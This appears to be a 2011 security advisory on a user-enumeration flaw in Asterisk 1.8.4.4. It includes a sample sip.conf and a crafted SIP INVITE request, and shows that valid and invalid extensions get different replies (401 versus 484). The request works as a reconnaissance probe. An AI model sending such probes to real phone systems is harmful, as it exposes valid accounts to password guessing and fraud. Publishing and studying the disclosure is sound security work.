The INVITE method in use by Asterisk version 1.8.4.4 allows for remote user enumeration.
c8d09e1a6bc234ffc02445e7446b5216f7017ea2bb2d57463d5af6d921a8ff5c
Asterisk 1.8.4.4, sip response permit username identification through use INVITE
Author: francesco.tornieri \"At\" verona-wireless.net
Summary: Sip responses permit user identification
Reference: https://downloads.asterisk.org/pub/security/AST-2011-011.pdf
Release Date: 30/06/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.4.4
Description:
In the last release (1.8.4.4) the Digium's developers have added a patch to mitigate extensions enumeration but it's still possible to enumerate it through use of craft INVITE method (it's only work if "allowguest=yes").
Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=127.0.0.1
realm=asterisk
allowguest=yes <----
alwaysauthreject=yes <----
[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729
[500](template)
callerid=phone200<500>
username=500
secret=password
------------------------
Craft Sip INVITE example
------------------------
INVITE sip:500@127.0.0.1 SIP/2.0
CSeq: 123 INVITE
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
From: <sip:500@127.0.0.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 571579d6e5814dff04ac7cd42672738f
To: <sip:500@127.0.0.1>
----------------
Method: REGISTER
----------------
Valid user (user 500)
Response:
---
SIP/2.0 401 Unauthorized
---
Invalid user (user 501)
Response:
---
SIP/2.0 484 Address Incomplete
---
Francesco Tornieri